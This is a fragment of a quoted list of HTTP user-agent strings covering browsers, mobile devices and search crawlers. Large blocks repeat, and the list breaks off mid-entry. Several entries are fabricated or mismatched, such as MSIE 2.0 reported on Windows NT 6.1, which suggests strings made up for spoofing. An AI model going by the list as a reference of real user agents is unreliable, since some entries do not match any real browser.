'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 